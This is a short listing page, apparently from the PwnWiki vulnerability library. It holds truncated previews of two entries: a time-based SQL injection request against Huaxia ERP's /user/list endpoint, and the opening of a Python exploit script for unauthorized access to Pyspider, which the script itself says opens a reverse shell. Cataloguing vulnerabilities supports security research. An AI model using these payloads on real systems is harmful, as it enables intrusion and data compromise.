华夏ERP SQL注入漏洞 免费、自由、人人可编辑的漏洞库--pwnwiki.com , Payload GET /user/list?search=%7B%22userName%22%3A%22'and+sleep(3)--%22%2C%22loginName%22 ... 阅读全文
Pyspider未授权访问漏洞 免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , exp.py import requests print("这是pyspider未授权访问的EXP,它能反弹shell,但由于本人VPS过期未能测试") data=''' web ... 阅读全文